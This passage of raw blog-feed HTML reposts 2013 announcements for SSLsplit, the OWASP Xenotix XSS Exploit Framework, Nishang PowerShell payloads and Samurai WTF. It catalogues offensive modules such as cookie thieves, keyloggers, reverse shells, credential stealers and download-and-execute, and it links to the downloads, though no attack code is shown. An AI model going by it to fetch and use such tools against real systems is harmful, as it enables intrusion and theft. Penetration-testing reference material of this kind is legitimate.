<h2 style="font-size: 30px; font-weight: normal; line-height: 1; margin: 0.1875em 0px; padding: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Installation</span></h2>
<div style="line-height: 1.5em; margin-bottom: 1em; padding: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">SSLsplit is or will be available as a package or port on the following systems:</span></div>
<ul style="list-style-position: outside; margin: 1em 20px 1em 0px; padding-left: 1.4em;">
<li style="line-height: 1.5em; list-style-type: square;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Arch Linux AUR: <a class="external" href="https://aur.archlinux.org/packages.php?ID=59243" style="outline: none; text-decoration: none;">sslsplit</a></span></li>
<li style="line-height: 1.5em; list-style-type: square;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Fedora: <a class="external" href="https://apps.fedoraproject.org/packages/sslsplit" style="outline: none; text-decoration: none;">sslsplit</a></span></li>
<li style="line-height: 1.5em; list-style-type: square;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Kali: <a class="external" href="http://git.kali.org/gitweb/?p=packages/sslsplit.git" style="outline: none; text-decoration: none;">sslsplit</a></span></li>
<li style="line-height: 1.5em; list-style-type: square;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Backtrack: <a class="external" href="http://redmine.backtrack-linux.org:8080/issues/916" style="outline: none; text-decoration: none;">sslsplit</a></span></li>
</ul>
<div style="line-height: 1.5em; margin-bottom: 1em; padding: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">To install from source:</span></div>
<pre style="font-family: 'andale mono', 'lucida console', monospace; line-height: 18px; margin-bottom: 1.5em; margin-top: 20px; padding: 0px;"><code class=" ruby" style="display: block; font-family: 'andale mono', 'lucida console', monospace;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">make
make <span class="keymethods">test</span> <span class="comment"># optional unit tests</span>
make install <span class="comment"># optional install</span>
</span></code></pre>
<div style="line-height: 1.5em; margin-bottom: 1em; padding: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Dependencies are autoconfigured using pkg-config. If dependencies are not picked up and fixing <code style="font-family: 'andale mono', 'lucida console', monospace; line-height: 18px;">PKG_CONFIG_PATH</code> does not help, you can specify their respective locations manually by setting <code style="font-family: 'andale mono', 'lucida console', monospace; line-height: 18px;">OPENSSL_BASE</code>, <code style="font-family: 'andale mono', 'lucida console', monospace; line-height: 18px;">LIBEVENT_BASE</code>and/or <code style="font-family: 'andale mono', 'lucida console', monospace; line-height: 18px;">CHECK_BASE</code> to the respective prefixes.</span></div>
<div style="line-height: 1.5em; margin-bottom: 1em; padding: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">You can override the default install prefix (<code style="font-family: 'andale mono', 'lucida console', monospace; line-height: 18px;">/usr/local</code>) by setting <code style="font-family: 'andale mono', 'lucida console', monospace; line-height: 18px;">PREFIX</code>.</span></div>
<h2 style="font-size: 30px; font-weight: normal; line-height: 1; margin: 0.1875em 0px; padding: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Development</span></h2>
<div style="line-height: 1.5em; margin-bottom: 1em; padding: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">SSLsplit is being developed on Github. For bug reports, please use the Github issue tracker. For patch submissions, please send pull requests.</span></div>
<div style="line-height: 1.5em; margin-bottom: 1em; padding: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><a class="external" href="https://github.com/droe/sslsplit" style="outline: none; text-decoration: none;">https://github.com/droe/sslsplit</a></span></div>
<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif;">Source-<br /><a href="http://www.roe.ch/SSLsplit" style="outline: none;">http://www.roe.ch/SSLsplit</a></span><br /><br />Screenshot -</span><div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBWHUol6ZlIjqOUUIGXb_MKmKT6vMqLJVBrnj8G8dCn890wVRH3qUV2cxZahvEkeLawpVJkfis1pgnFmEDvyr69bYWZqPoBfYcICPIduuAk9Da3RcGX9daQlNr66i_sgtoc-66ZlE2CFz8/s1600/hacking-ssslsplit-tool.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; outline: none;"><span style="background-color: white; color: black;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBWHUol6ZlIjqOUUIGXb_MKmKT6vMqLJVBrnj8G8dCn890wVRH3qUV2cxZahvEkeLawpVJkfis1pgnFmEDvyr69bYWZqPoBfYcICPIduuAk9Da3RcGX9daQlNr66i_sgtoc-66ZlE2CFz8/s1600/hacking-ssslsplit-tool.jpg" style="border: none; padding: 0px;" /></span></a></div>
<span style="background-color: white;"><br /></span></div>
<div class="post-share-buttons" style="background-color: white; display: inline-block; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-top: 0.5em; vertical-align: middle;">
<a class="goog-inline-block share-button sb-email" href="http://www.blogger.com/share-post.g?blogID=3258331267844655312&postID=943340368503754065&target=email" style="background-image: url(http://www.blogger.com/img/share_buttons_20_2.png) !important; background-position: 0px 0px !important; background-repeat: no-repeat no-repeat !important; display: inline-block; height: 20px; margin-left: -1px; outline: none; overflow: hidden; position: relative; width: 20px;" target="_blank" title="Email This"></a></div>
<div style="-webkit-text-stroke-width: 0px; background-color: #333333; clear: both; color: #909090; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
</div>
</div>
Fahimhttp://www.blogger.com/profile/06549473576655561875noreply@blogger.com0tag:blogger.com,1999:blog-3265662506015756178.post-39004031561774267222013-09-02T14:17:00.001-07:002013-09-02T14:17:02.750-07:00Xenotix XSS Exploit Framework v4 2013 - an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif; font-size: 13px; line-height: 20px;">OWASP Xenotix XSS Exploit Framework is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. It provides Zero False Positive scan results with its unique Triple Browser Engine (Trident, WebKit, and Gecko) embedded scanner. It is claimed to have the world’s 2nd largest XSS Payloads of about 1500+ distinctive XSS Payloads for effective XSS vulnerability detection and WAF Bypass. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes highly offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.</span></span><br />
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif;">Scanner Modules </span></span><ul style="margin: 0px 20px 20px 0px; padding-left: 40px;">
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Manual Mode Scanner </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Auto Mode Scanner </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">DOM Scanner </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Multiple Parameter Scanner </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">POST Request Scanner </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Header Scanner </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Fuzzer </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Hidden Parameter Detector</span></li>
</ul>
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Information Gathering Modules </span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<ul style="margin: 0px 20px 20px 0px; padding-left: 40px;">
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Victim Fingerprinting </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Browser Fingerprinting </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Browser Features Detector </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Ping Scan </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Port Scan </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Internal Network Scan</span></li>
</ul>
<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif;">Exploitation Modules </span></span><ul style="margin: 0px 20px 20px 0px; padding-left: 40px;">
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Send Message </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Cookie Thief </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Phisher </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Tabnabbing </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Keylogger </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">HTML5 DDoSer </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Executable Drive By </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">JavaScript Shell </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Reverse HTTP WebShell </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Drive-By Reverse Shell </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Metasploit Browser Exploit </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Firefox Reverse Shell Addon (Persistent) </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Firefox Session Stealer Addon (Persistent) </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Firefox Keylogger Addon (Persistent) </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Firefox DDoSer Addon (Persistent) </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Firefox Linux Credential File Stealer Addon (Persistent) </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Firefox Download and Execute Addon (Persistent)</span></li>
</ul>
<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif;">Utility Modules </span></span><ul style="margin: 0px 20px 20px 0px; padding-left: 40px;">
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">WebKit Developer Tools </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Payload Encoder</span></li>
</ul>
<div>
<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif;">Support on Facebook </span></span><ul style="line-height: 19.1875px; margin: 0px 20px 20px 0px; padding-left: 40px;">
<li><a href="https://www.facebook.com/xenotix" style="outline: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;">Xenotix on Facebook</span></span></a></li>
</ul>
<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif;">White Paper and Slides </span></span><ul style="margin: 0px 20px 20px 0px; padding-left: 40px;">
<li><a href="http://www.nullcon.net/website/archives/presentation/Xenotix_XSS_Exploit_Framework_By_Ajin_Abraham.pdf" style="outline: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;">Nullcon Goa 2013, India (Slides)</span></span></a></li>
<li><a href="http://www.exploit-db.com/wp-content/themes/exploit/docs/21223.pdf" style="outline: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;">Download From Exploit-DB</span></span></a></li>
<li><a href="http://packetstormsecurity.org/files/116455/Detecting-And-Exploiting-XSS-With-Xenotix-XSS-Exploit-Framework.html" style="outline: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;">Download From PacketStorm Security</span></span></a></li>
</ul>
<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif;">Tutorials</span><br /><span style="font-family: Georgia, 'Times New Roman', serif;">Version 3 Videos </span></span><ul style="margin: 0px 20px 20px 0px; padding-left: 40px;">
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><a href="http://www.youtube.com/watch?v=CJEgO4_kd-8" style="outline: none;">OWASP Xenotix XSS Exploit Framework v3 2013: XSS Scanner Module</a></span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><a href="http://www.youtube.com/watch?v=owfF9C_Xerw" style="outline: none;">OWASP Xenotix XSS Exploit Framework v3 2013: XSS Keylogger</a></span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><a href="http://www.youtube.com/watch?v=i8c3kf4t6A8" style="outline: none;">OWASP Xenotix XSS Exploit Framework v3 2013: XSS Executable Drive-By</a></span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><a href="http://www.youtube.com/watch?v=IT-8IH3yRrA" style="outline: none;">OWASP Xenotix XSS Exploit Framework v3 2013: XSS Reverse Shell</a></span></li>
<li><a href="http://www.youtube.com/watch?v=cgLGgVWvi9Y" style="outline: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;">OWASP Xenotix XSS Exploit Framework v3 2013: XSS DDoSer</span></span></a></li>
</ul>
<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif;">Version 2 Videos </span></span><ul style="line-height: 19.1875px; margin: 0px 20px 20px 0px; padding-left: 40px;">
<li><a href="http://www.youtube.com/watch?v=ei1ny7L8-8k" style="outline: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;">Xenotix XSS Exploit Framework 2013 Version 2 Tutorial</span></span></a></li>
</ul>
<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif;">Version 1 Videos </span></span><ul style="line-height: 19.1875px; margin: 0px 20px 20px 0px; padding-left: 40px;">
<li><a href="http://www.youtube.com/watch?v=UyxEV3FLiX8" style="outline: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;">Xenotix XSS Exploit Framework 2012 Version 1 Tutorial</span></span></a></li>
</ul>
<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif;">Talk on OWASP Xenotix XSS Exploit Framework [video] </span></span><ul style="line-height: 19.1875px; margin: 0px 20px 20px 0px; padding-left: 40px;">
<li><a href="http://www.youtube.com/watch?v=NYZLP0q7-y4" style="outline: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;">OWASP Xenotix XSS Exploit Framework v2 2012: Talk at ClubHack 2012, India</span></span></a></li>
</ul>
<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif;">IMPORTANT</span></span><ul style="margin: 0px 20px 20px 0px; padding-left: 40px;">
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">The tool may be detected by some Anti-virus solutions as a threat. However it is due to the features in the exploitation framework.</span></li>
</ul>
<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif;">Download </span></span><ul style="margin: 0px 20px 20px 0px; padding-left: 40px;">
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Version 4 <a href="http://keralacyberforce.in/downloads/Xenotix%20XSS%20Exploit%20Framework%20V4.rar" style="outline: none;">Download OWASP Xenotix XSS Exploit Framework v4</a></span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Version 4 Mirror: <a href="https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar" style="outline: none;">DropBox</a></span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Version 3 <a href="https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip" style="outline: none;">File:OWASP Xenotix XSS Exploit Framework v3 2013.zip</a></span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Version 2 <a href="https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip" style="outline: none;">File:Xenotix XSS Exploit Framework 2013 v2.zip</a></span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Version 1 <a href="https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip" style="outline: none;">File:Xenotix XSS Exploitation Framework.zip</a></span></li>
</ul>
<ul style="line-height: 19.1875px; margin: 0px 20px 20px 0px; padding-left: 40px;"></ul>
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Screenshot -</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmGzqRUEpYAwyltKThjwFtbW-ZY-RIfYkSKI7hyphenhyphenYRrTnA89Q520TrEgUf0RILsAsdUpw-_U4YoJUMex_Ge_NyLw_xaZv4ffXuYnzsGrG01lXDzKlB-KVSUPNN4GngOOx0nUCHm0rgNWjZv/s1600/800px-Xenotix.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; outline: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmGzqRUEpYAwyltKThjwFtbW-ZY-RIfYkSKI7hyphenhyphenYRrTnA89Q520TrEgUf0RILsAsdUpw-_U4YoJUMex_Ge_NyLw_xaZv4ffXuYnzsGrG01lXDzKlB-KVSUPNN4GngOOx0nUCHm0rgNWjZv/s1600/800px-Xenotix.png" style="border: none; padding: 0px;" width="400" /></span></span></a></div>
<div>
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; line-height: 19.1875px;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; line-height: 19.1875px;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; line-height: 19.1875px;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; line-height: 19.1875px;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; line-height: 19.1875px;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; line-height: 19.1875px;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; line-height: 19.1875px;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; line-height: 19.1875px;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; line-height: 19.1875px;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; line-height: 19.1875px;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; line-height: 19.1875px;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; line-height: 19.1875px;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif;"><br /></span><span style="font-family: Georgia, 'Times New Roman', serif;">Source-</span><br /><a href="https://www.owasp.org/index.php/OWASP_Xenotix_XSS_Exploit_Framework" style="outline: none;"><span style="font-family: Georgia, 'Times New Roman', serif;">https://www.owasp.org/index.php/OWASP_Xenotix_XSS_Exploit_Framework</span></a></span></div>
</div>
Fahimhttp://www.blogger.com/profile/06549473576655561875noreply@blogger.com0tag:blogger.com,1999:blog-3265662506015756178.post-15787186833168663422013-09-02T14:16:00.001-07:002013-09-02T14:16:24.442-07:00Nishang 0.3.0 released - Penetration Testing Using PowerShell<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPj-A7PDEEPvHklaDetwurXHh7xBHR78jFjQhdB3nldtPyz-qDH06nLsKSSNeEiBrLHjjiDIR2B2ZWWRI0Dfzhs9hXxexE03jiM7yUTu4rG-TCEmYqcbWnHdwiSDWuITa7moG7HCUrkPu_/s1600/powershell.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; outline: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPj-A7PDEEPvHklaDetwurXHh7xBHR78jFjQhdB3nldtPyz-qDH06nLsKSSNeEiBrLHjjiDIR2B2ZWWRI0Dfzhs9hXxexE03jiM7yUTu4rG-TCEmYqcbWnHdwiSDWuITa7moG7HCUrkPu_/s1600/powershell.png" style="border: none; padding: 0px;" /></span></span></a></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and post exploitation during Penetraion Tests. The scripts are written on the basis of requirement by the author during real Penetration Tests.</span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">PAYLOADS</span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">It contains many interesting scripts like download and execute, keylogger, dns txt pwnage, wait for command and much more.</span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">HELP</span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">All payloads and scripts are Get-Help compatible. Use "Get-Help <scriptname.ps1> -full" on a PowerShell prompt to get full help details.</span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">LATEST CODE</span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Checkout svn repo for latest code</span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">svn checkout <a href="http://nishang.googlecode.com/svn/trunk/" rel="nofollow" style="outline: none;">http://nishang.googlecode.com/svn/trunk/</a> nishang</span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">More details on my blog <a href="http://labofapenetrationtester.blogspot.com/" rel="nofollow" style="outline: none;">http://labofapenetrationtester.blogspot.com</a></span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: 13px; line-height: 20px;">CHANGELOG</span><br />
<ul style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin: 0px 20px 20px 0px; padding-left: 40px;">
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Added Powerpreter</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Added Execute-DNSTXT-Code</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Bug fix in Create-MultipleSessions.</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Changes to StringToBase64. It now supports Unicode encoding which makes it usable with -Encodedcommand</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">More Changes to StringToBase64. Now a file can be converted.</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Added Copy-VSS</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Information_Gather shows output in better format now.</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Information_Gather renamed to Get-Information.</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Wait for command renamed to HTTP-Backdoor.</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Time_Execution renamed Execute-OnTime</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Invoke-PingSweep renamed to Port-Scan</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Invoke-Medusa renamed to Brute-Force</span></li>
</ul>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Download -</span></div>
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: 13px; line-height: 20px;"><a href="https://nishang.googlecode.com/files/nishang_0.3.0.zip" style="outline: none;">nishang_0.3.0.zip</a></span><br />
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><a href="https://code.google.com/p/nishang/downloads/list" style="outline: none;">Download other versions from here</a></span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Some blog posts to check out to begin with:</span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<a href="http://labofapenetrationtester.blogspot.in/2012/08/introducing-nishang-powereshell-for.html" rel="nofollow" style="outline: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;">http://labofapenetrationtester.blogspot.in/2012/08/introducing-nishang-powereshell-for.html</span></span></a></div>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><a href="http://labofapenetrationtester.blogspot.in/2013/08/powerpreter-and-nishang-Part-1.html" rel="nofollow" style="outline: none;">http://labofapenetrationtester.blogspot.in/2013/08/powerpreter-and-nishang-Part-1.html</a></span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Source-</span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<a href="https://code.google.com/p/nishang/" style="outline: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;">https://code.google.com/p/nishang/</span></span></a></div>
</div>
</div>
Fahimhttp://www.blogger.com/profile/06549473576655561875noreply@blogger.com0tag:blogger.com,1999:blog-3265662506015756178.post-11538736056410681572013-09-02T14:15:00.001-07:002013-09-02T14:15:58.662-07:00Samurai Web Testing Framework v2.1 released<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 17px; margin-bottom: 15px; margin-top: 15px; min-height: 1px; padding: 0px; text-align: justify;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">The Samurai Web Testing Framework is a live linux environment that has been pre-configured to function as a web pen-testing environment. The CD contains the best of the open source and free tools that focus on testing and attacking websites. In developing this environment, we have based our tool selection on the tools we use in our security practice. We have included the tools used in all four steps of a web pen-test.</span></div>
<div class="separator" style="clear: both; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; text-align: center;">
